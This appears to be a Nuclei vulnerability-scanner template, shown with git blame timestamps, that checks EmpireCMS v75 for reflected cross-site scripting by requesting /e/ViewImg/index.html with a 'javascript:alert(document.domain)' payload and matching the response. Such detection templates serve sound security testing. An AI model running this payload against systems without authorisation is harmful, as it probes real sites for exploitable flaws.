nuclei-templates/vulnerabilities/other/empirecms-xss.yaml

26 lines
497 B
YAML
Raw Normal View History

2021-04-05 08:16:27 +00:00
id: empirecms-xss
info:
name: EmpireCMS v75 Cross-Site Scripting
2021-04-05 08:16:27 +00:00
author: pikpikcu
severity: medium
reference:
- https://www.geek-share.com/detail/2777280260.html
2021-04-05 08:16:27 +00:00
tags: empirecms,xss
requests:
- method: GET
path:
2021-04-05 16:43:16 +00:00
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)"
2021-04-05 08:16:27 +00:00
matchers-condition: and
matchers:
- type: word
words:
- 'onmousewheel=\"return bbimg(this)\"'
- type: status
status:
- 200